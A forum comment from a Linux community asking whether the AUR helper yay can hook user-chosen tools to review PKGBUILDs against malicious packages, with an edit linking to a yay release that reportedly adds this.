this post was submitted on 22 Jun 2026
41 points (100.0% liked)

Linux

14189 readers
548 users here now

A community for everything relating to the GNU/Linux operating system (except the memes!)

Also, check out:

Original icon base courtesy of lewing@isc.tamu.edu and The GIMP

founded 3 years ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
[–] teawrecks@sopuli.xyz 3 points 1 week ago* (last edited 1 week ago)

Does anyone know if yay gives me the ability to hook my own tool in to review pkgbuilds before accepting them? They argue that they don't want to just give attackers access to a scanning tool, because all they'd do is just iterate on their pkgbuild until it reports "not detected". But if yay gives me an easy way to hook in whatever tool I want, the attacker can't be sure what tool to defeat. If thousands of people all run various tools, surely a few of them will spot the anomaly quickly.

Edit: it looks like they've added this exact functionality in response to the attacks: https://jguer.space/blog/2026-06-15-yay-v13